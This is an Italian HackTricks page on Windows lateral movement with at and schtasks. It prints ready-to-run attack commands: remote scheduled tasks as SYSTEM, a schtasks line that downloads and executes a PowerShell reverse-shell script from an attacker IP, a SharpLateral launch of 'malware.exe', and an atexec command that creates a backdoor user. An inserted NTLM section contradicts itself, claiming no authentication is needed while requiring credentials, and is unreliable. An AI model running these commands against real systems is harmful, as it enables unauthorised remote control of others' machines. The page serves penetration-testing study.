hacktricks/windows-hardening/lateral-movement/atexec.md
2024-04-06 18:35:30 +00:00

5.2 KiB

AtExec / SchtasksExec

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Come funziona

At consente di pianificare attività in host in cui si conosce il nome utente/(password/Hash). Quindi, puoi usarlo per eseguire comandi in altri host e ottenere l'output.

At \\victim 11:00:00PM shutdown -r

Per utilizzare schtasks, è necessario prima creare il task e poi chiamarlo:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

Esecuzione remota di comandi tramite NTLM

L'esecuzione remota di comandi tramite NTLM è una tecnica che sfrutta le debolezze del protocollo NTLM per eseguire comandi su un sistema remoto senza autenticazione. Questa tecnica può essere utilizzata durante un test di penetrazione per ottenere l'accesso a un sistema remoto e sfruttare le sue vulnerabilità.

Requisiti

Per utilizzare questa tecnica, è necessario soddisfare i seguenti requisiti:

  • Avere accesso a un sistema remoto che utilizza l'autenticazione NTLM.
  • Avere le credenziali di accesso a un account utente valido sul sistema remoto.

Passaggi

Ecco i passaggi per eseguire l'esecuzione remota di comandi tramite NTLM:

  1. Identificare un sistema remoto che utilizza l'autenticazione NTLM.
  2. Ottenere le credenziali di accesso a un account utente valido sul sistema remoto.
  3. Utilizzare un tool come atexec per eseguire comandi sul sistema remoto senza autenticazione.
  4. Utilizzare i comandi eseguiti per ottenere l'accesso al sistema remoto e sfruttare le sue vulnerabilità.

Esempio

Ecco un esempio di come utilizzare atexec per eseguire comandi su un sistema remoto tramite NTLM:

atexec -c "net user hacker password123 /add" -s <indirizzo_ip_sistema_remoto>

In questo esempio, il comando net user hacker password123 /add viene eseguito sul sistema remoto per creare un nuovo utente chiamato "hacker" con la password "password123".

Contromisure

Per proteggersi dall'esecuzione remota di comandi tramite NTLM, è possibile adottare le seguenti contromisure:

  • Utilizzare l'autenticazione NTLMv2 invece di NTLM.
  • Impostare una password complessa per gli account utente.
  • Limitare l'accesso ai sistemi remoti solo agli utenti autorizzati.
  • Monitorare attentamente l'attività di rete per individuare eventuali tentativi di esecuzione remota di comandi non autorizzati.

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Puoi anche utilizzare SharpLateral:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

Ulteriori informazioni sull'uso di schtasks con silver tickets qui.

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks: